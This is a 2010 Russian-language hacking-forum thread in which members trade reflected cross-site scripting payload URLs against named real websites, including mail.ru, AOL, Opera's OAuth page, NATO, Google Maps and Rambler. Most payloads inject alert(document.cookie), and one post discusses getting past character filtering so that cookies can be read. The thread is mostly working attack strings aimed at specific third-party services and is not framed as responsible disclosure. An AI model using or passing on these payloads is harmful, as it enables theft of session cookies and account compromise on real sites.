HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости Mail-сервис
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 19.10.2010, 22:48
Ruslan1817
Постоянный
Регистрация: 17.01.2009
Сообщений: 309
Провел на форуме:
2991228

Репутация: 403
По умолчанию

Цитата:
Сообщение от satana666  
satana666 said:
Пасcивка на mail.ru
PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//starlook.lady.mail.ru/commented?">alert('XSS')[/COLOR][/COLOR] 
Вот только в alert(document.cookie) точка заменяется на _
Это можно как-нибудь обойти?
так будет лучше.

Код HTML:
HTML:
http://starlook.lady.mail.ru/commented?period=month">alert(document.cookie)
Зря выложил ее, завтра уже будет закрыта.
 
Ответить с цитированием

  #2  
Старый 23.10.2010, 23:19
Ruslan1817
Постоянный
Регистрация: 17.01.2009
Сообщений: 309
Провел на форуме:
2991228

Репутация: 403
По умолчанию

Код HTML:
HTML:
http://help.aol.com/help/microsites/searchEntry.do?&searchString=">alert(document.cookie)
 
Ответить с цитированием

  #3  
Старый 04.11.2010, 17:24
Ruslan1817
Постоянный
Регистрация: 17.01.2009
Сообщений: 309
Провел на форуме:
2991228

Репутация: 403
По умолчанию

Код:
Code:
http://auth.opera.com/service/oauth/authorize?oauth_token=RTMG0hYfEyPQcAltkyZIdmAXHaJyTf9X">alert(document.cookie)
 
Ответить с цитированием

  #4  
Старый 14.11.2010, 01:13
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

хотья это не почтовик, но думаю модеры простят меня

http://www.nato.int/cps/en/natolive/search.htm

">alert('ololo')

PR-9

тИЦ- 1100
 
Ответить с цитированием

  #5  
Старый 15.11.2010, 19:45
Ruslan1817
Постоянный
Регистрация: 17.01.2009
Сообщений: 309
Провел на форуме:
2991228

Репутация: 403
По умолчанию

Код:
Code:
http://maps.google.com/maps?ll=55.354135,40.297852&spn=42.876902,89.560547&z=4&layer=t&hl=ru
уязвимо поле - Задайте местоположение по умолчанию

поймай меня
 
Ответить с цитированием

  #6  
Старый 16.11.2010, 14:25
~d0s~
Познающий
Регистрация: 17.04.2010
Сообщений: 75
Провел на форуме:
691279

Репутация: 55
По умолчанию

снова lady.mail.ru , такой тут еще не было вроде

Код:
Code:
http://lady.mail.ru/product/?letter=1alert(123)
 
Ответить с цитированием

  #7  
Старый 17.11.2010, 16:50
~d0s~
Познающий
Регистрация: 17.04.2010
Сообщений: 75
Провел на форуме:
691279

Репутация: 55
По умолчанию

kids.rambler.ru

Код:
Code:
http://kids.rambler.ru/faq/271063/tns-counter.ru?p=1alert('~d0s~')
 
Ответить с цитированием

  #8  
Старый 19.11.2010, 16:25
~d0s~
Познающий
Регистрация: 17.04.2010
Сообщений: 75
Провел на форуме:
691279

Репутация: 55
По умолчанию

tv.ukr.net

Код:
Code:
http://tv.ukr.net/?scn=tv&sb=1'>alert(1)
Там почти весь сайт,видимо хсс они за багу не считают
 
Ответить с цитированием

  #9  
Старый 21.11.2010, 01:52
~d0s~
Познающий
Регистрация: 17.04.2010
Сообщений: 75
Провел на форуме:
691279

Репутация: 55
По умолчанию

rabota.ngs.ru

Код:
Code:
http://rabota.ngs.ru/vacancies/search/?other2=yes&rubrics%5B%5D=1">alert(1)
 
Ответить с цитированием

  #10  
Старый 22.11.2010, 17:07
~d0s~
Познающий
Регистрация: 17.04.2010
Сообщений: 75
Провел на форуме:
691279

Репутация: 55
По умолчанию

autorambler.ru

Код:
Code:
http://autorambler.ru/bz/pdd/pddonline/?type=1//-->alert(123)
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[ Обзор Уязвимостей .:Drupal :. ] Cawabunga Веб-уязвимости 43 12.01.2021 19:31
Cross Site Scripting FAQ k00p3r Уязвимости 6 12.06.2005 16:23



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ